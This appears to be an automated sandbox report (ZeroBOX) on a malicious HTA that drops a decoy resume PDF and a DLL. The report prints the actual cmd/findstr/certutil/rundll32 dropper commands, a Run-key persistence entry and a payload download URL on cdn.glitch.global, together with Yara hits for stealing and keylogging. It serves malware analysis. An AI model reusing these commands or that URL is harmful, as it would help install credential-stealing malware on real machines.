Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 20, 2024, 5:44 p.m.	Aug. 20, 2024, 5:46 p.m.

Size	342.9KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`7e5d584176b92f73bc82886c9945efc9`
SHA256	`45980cc8afb4e1b3738130d0855bb608530eef6731c5116fd053ac6e04159725`
CRC32	`1D19A53D`
ssdeep	`6144:LiopiPTKIiytDTX2mCUgESG3nlZWNQ04qVHiPNq371Yj5FL:LQuEFCQvWNQQ8PNqCNFL`
Yara	hide_executable_file - Hide executable file

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\2.hta
2536
- cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp & findstr /b "JVBERi0xLjcK" "C:\Users\test22\AppData\Local\Temp\2.hta">temp2.log & certutil -decode -f temp2.log My_Resume.pdf & del temp2.log & My_Resume.pdf
  2624
  - findstr.exe findstr /b "JVBERi0xLjcK" "C:\Users\test22\AppData\Local\Temp\2.hta"
    2708
  - certutil.exe certutil -decode -f temp2.log My_Resume.pdf
    2760
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "C:\Users\test22\AppData\Local\Temp\My_Resume.pdf"
    2836
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef41cf1e8,0x7fef41cf1f8,0x7fef41cf208
      2904
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2840 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      2972
- cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local & findstr /b "TVqQAAMAAAA" "C:\Users\test22\AppData\Local\Temp\2.hta">temp1.log & certutil -decode -f temp1.log netutil.dll & del temp1.log & rundll32 netutil.dll,MainWork
  196
  - findstr.exe findstr /b "TVqQAAMAAAA" "C:\Users\test22\AppData\Local\Temp\2.hta"
    2236
  - certutil.exe certutil -decode -f temp1.log netutil.dll
    1632
  - rundll32.exe rundll32 netutil.dll,MainWork
    2496

Name	Response	Post-Analysis Lookup
cdn.glitch.global	CNAME j.sni.global.fastly.net A 146.75.50.132	151.101.2.132

IP Address	Status	Action
146.75.50.132	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Aug. 20, 2024, 5:44 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Aug. 20, 2024, 5:44 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (36 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:44 p.m.			0	0

Command line console output was observed (6 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 20, 2024, 5:44 p.m.	buffer: Input Length = 231544 console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2024, 5:44 p.m.	buffer: Output Length = 173657 console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2024, 5:44 p.m.	buffer: CertUtil: -decode command completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2024, 5:44 p.m.	buffer: Input Length = 104450 console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2024, 5:44 p.m.	buffer: Output Length = 78336 console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2024, 5:44 p.m.	buffer: CertUtil: -decode command completed successfully. console_handle: 0x00000007	1	1

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 20, 2024, 5:44 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Aug. 20, 2024, 5:44 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 179432080 registers.r15: 179432520 registers.rcx: 1520 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 90921376 registers.rsp: 179431240 registers.r11: 179435776 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1536 registers.r12: 34191728 registers.rbp: 179431392 registers.rdi: 33927984 registers.rax: 3812864 registers.r13: 179431952	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (1 event)

request

GET http://cdn.glitch.global/4ab4f138-6f66-4b39-a7dc-9d4843dcf34f/net32.log?v=1723097729666

Allocates read-write-execute memory (usually to unpack itself) (18 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2972 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 1632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71e2e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75d41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75e61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76161000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74160000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73641000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73604000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74001000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71d11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 20, 2024, 5:44 p.m.	process_identifier: 2496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71d01000 process_handle: 0xffffffff	1

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process chrome.exe with pid 2836 crashed
__exception__ Aug. 20, 2024, 5:44 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 179432080 registers.r15: 179432520 registers.rcx: 1520 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 90921376 registers.rsp: 179431240 registers.r11: 179435776 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1536 registers.r12: 34191728 registers.rbp: 179431392 registers.rdi: 33927984 registers.rax: 3812864 registers.r13: 179431952	1	0	0

Steals private information from local Internet browsers (38 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing IP Blacklist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Module Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Side-Effect Free Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List Prefix Set
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Inclusion Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Extension Blacklist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Stability\2836-1724143442234375.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-63327DF3-A54.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Resource Blacklist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\ca403090-bfd0-4425-9162-d452436bfe93.dmp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-66C46569-B14.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\AnyIpMalware.store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\My_Resume.pdf

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\netutil.dll

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp & findstr /b "JVBERi0xLjcK" "C:\Users\test22\AppData\Local\Temp\2.hta">temp2.log & certutil -decode -f temp2.log My_Resume.pdf & del temp2.log & My_Resume.pdf
cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local & findstr /b "TVqQAAMAAAA" "C:\Users\test22\AppData\Local\Temp\2.hta">temp1.log & certutil -decode -f temp1.log netutil.dll & del temp1.log & rundll32 netutil.dll,MainWork

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\netutil.dll

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 20, 2024, 5:44 p.m.	show_type: 0 filepath_r: cmd parameters: /c cd /d C:\Users\test22\AppData\Local\Temp & findstr /b "JVBERi0xLjcK" "C:\Users\test22\AppData\Local\Temp\2.hta">temp2.log & certutil -decode -f temp2.log My_Resume.pdf & del temp2.log & My_Resume.pdf filepath: cmd	1	1	0
ShellExecuteExW Aug. 20, 2024, 5:44 p.m.	show_type: 0 filepath_r: cmd parameters: /c cd /d C:\Users\test22\AppData\Local & findstr /b "TVqQAAMAAAA" "C:\Users\test22\AppData\Local\Temp\2.hta">temp1.log & certutil -decode -f temp1.log netutil.dll & del temp1.log & rundll32 netutil.dll,MainWork filepath: cmd	1	1	0

File has been identified by one AntiVirus engine on VirusTotal as malicious (1 event)

huorong

Trojan/JS.Agent.cy

Potentially malicious URLs were found in the process memory dump (50 out of 1130 events)

url	https://crashpad.chromium.org/bug/new
url	https://crashpad.chromium.org/
url	https://clients4.google.com/invalidation/android/request/
url	http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
url	http://services.ukrposhta.com/postindex_new/
url	http://dts.search-results.com/sr?lng=
url	http://inposdom.gob.do/codigo-postal/
url	http://creativecommons.org/ns
url	http://www.postur.fo/
url	https://qc.search.yahoo.com/search?ei=
url	https://cacert.omniroot.com/baltimoreroot.crt09
url	http://crbug.com/122474.
url	https://search.yahoo.com/search?ei=
url	http://t1.symcb.com/ThawtePCA.crl0/
url	http://crbug.com/31395.
url	https://support.google.com/chrome/answer/165139
url	http://crbug.com/320723
url	https://datasaver.googleapis.com/v1/clientConfigs
url	http://crl.starfieldtech.com/sfroot-g2.crl0L
url	https://ct.startssl.com/
url	https://suggest.yandex.com.tr/suggest-ff.cgi?part=
url	https://de.search.yahoo.com/favicon.ico
url	https://github.com/GoogleChrome/Lighthouse/issues
url	http://www.searchnu.com/favicon.ico
url	https://support.google.com/installer/?product=
url	http://msdn.microsoft.com/en-us/library/ms792901.aspx
url	https://www.najdi.si/search.jsp?q=
url	http://x.ss2.us/x.cer0
url	http://crl.geotrust.com/crls/gtglobal.crl04
url	https://accounts.google.com/ServiceLogin
url	https://accounts.google.com/OAuthLogin
url	https://c.android.clients.google.com/
url	https://www.google.com/tools/feedback/chrome/__submit
url	https://chrome.google.com/webstore/category/collection/dark_themes
url	http://check.googlezip.net/generate_204
url	http://ocsp.starfieldtech.com/08
url	http://www.guernseypost.com/postcode_finder/
url	http://crl.certum.pl/ca.crl0h
url	http://ator
url	https://suggest.yandex.by/suggest-ff.cgi?part=
url	http://feed.snap.do/?q=
url	https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
url	http://www.language
url	https://support.google.com/chrome/
url	http://developer.chrome.com/apps/declare_permissions.html
url	http://www.google.com/chrome/intl/ko/eula_text.html
url	https://www.globalsign.com/repository/03
url	http://www.startssl.com/sfsca.crl0
url	http://UA-Compatible
url	https://se.search.yahoo.com/search?ei=

Yara rule detected in process memory (50 out of 1343 events)

description	Match Windows Http API call	rule	Str_Win32_Http_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Client_SW_User_Data_Stealer	rule	Client_SW_User_Data_Stealer
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	browser info stealer	rule	infoStealer_browser_Zero
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Perform crypto currency mining	rule	BitCoin
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Possibly employs anti-virtualization techniques	rule	vmdetect
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Virtual currency	rule	Virtual_currency_Zero

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Aug. 20, 2024, 5:44 p.m.	status_code: 0xc0000005 process_identifier: 2836 process_handle: 0x0000000000000094		0	0
NtTerminateProcess Aug. 20, 2024, 5:44 p.m.	status_code: 0xc0000005 process_identifier: 2836 process_handle: 0x0000000000000094	1	0	0

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp & findstr /b "JVBERi0xLjcK" "C:\Users\test22\AppData\Local\Temp\2.hta">temp2.log & certutil -decode -f temp2.log My_Resume.pdf & del temp2.log & My_Resume.pdf
cmdline	cmd /c cd /d C:\Users\test22\AppData\Local\Temp & findstr /b "JVBERi0xLjcK" "C:\Users\test22\AppData\Local\Temp\2.hta">temp2.log & certutil -decode -f temp2.log My_Resume.pdf & del temp2.log & My_Resume.pdf
cmdline	cmd /c cd /d C:\Users\test22\AppData\Local & findstr /b "TVqQAAMAAAA" "C:\Users\test22\AppData\Local\Temp\2.hta">temp1.log & certutil -decode -f temp1.log netutil.dll & del temp1.log & rundll32 netutil.dll,MainWork
cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local & findstr /b "TVqQAAMAAAA" "C:\Users\test22\AppData\Local\Temp\2.hta">temp1.log & certutil -decode -f temp1.log netutil.dll & del temp1.log & rundll32 netutil.dll,MainWork

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Network Service

reg_value

rundll32 C:\Users\test22\AppData\Local\netutil.dll,MainWork

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\My_Resume.pdf

One or more non-whitelisted processes were created (3 events)

parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2840 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef41cf1e8,0x7fef41cf1f8,0x7fef41cf208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1184,9061651852341642892,891850401047473145,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=220B2723F758E8CC17061B64D5C32755 --mojo-platform-channel-handle=1224 --ignored=" --type=renderer " /prefetch:2

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://127.0.0.1

Resumed a suspended thread in a remote process potentially indicative of process injection (38 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2624 resumed a thread in remote process 2836
Process injection	Process 2904 resumed a thread in remote process 2836
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000021c suspend_count: 1 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
